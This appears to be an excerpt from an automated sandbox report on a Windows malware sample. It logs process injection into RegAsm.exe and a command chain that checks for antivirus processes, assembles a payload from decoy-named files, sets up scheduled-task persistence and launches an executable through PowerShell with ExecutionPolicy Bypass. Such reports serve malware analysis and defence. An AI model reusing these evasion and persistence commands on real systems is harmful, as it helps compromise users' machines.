Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902968Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9029CCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902A30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902A94Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902AF8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902B5CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902BC0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902C24Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902C88Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902CECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902D50Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902DB4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902E18Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902E7CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902EE0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902F44Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902FA8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90300CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903070Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9030D4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903138Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90319CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903200Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903264Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9032C8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90332CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903390Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9033F4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903458Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9034BCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903520Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903584Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9035E8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90364CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9036B0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903714Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903778Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9037DCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903840Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9038A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903908Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90396CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9039D0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903A34Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903A98Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903AFCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903B60Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903BC4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903C28Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903C8CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903CF0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903D54Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903DB8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903E1CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903E80Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903EE4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903F48Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903FACJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904010Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904074Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9040D8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90413CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9041A0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904204Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904268Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9042CCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904330Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904394Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9043F8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90445CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9044C0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904524Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904588Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9045ECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904650Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9046B4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904718Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90477CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9047E0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904844Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9048A8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90490CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904970Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9049D4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904A38Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904A9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904B00Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904B64Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904BC8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904C2CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904C90Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904CF4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904D58Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904DBCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904E20Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904E84Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904EE8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904F4CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904FB0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905014Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905078Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9050DCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905140Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9051A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905208Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90526CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9052D0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905334Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905398Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9053FCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905460Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9054C4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905528Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90558CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9055F0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905654Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9056B8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90571CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905780Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9057E4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905848Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9058ACJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905910Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905974Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9059D8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905A3CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905AA0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905B04Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905B68Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905BCCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905C30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905C94Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905CF8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905D5CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905DC0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905E24Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905E88Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905EECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905F50Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905FB4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906018Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90607CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9060E0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906144Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9061A8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90620CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906270Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9062D4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906338Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90639CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906400Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90C1C0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90C224Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90C288Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90C2ECJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00811B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,23_2_00811B4D
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007B338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,23_2_007B338B
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0081BBED SendInput,keybd_event,23_2_0081BBED
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0081EC9E mouse_event,23_2_0081EC9E
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pubJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.comJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub mJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com mJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /FJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\curcuma.exe "C:\Users\user\AppData\Local\Temp\curcuma.exe"
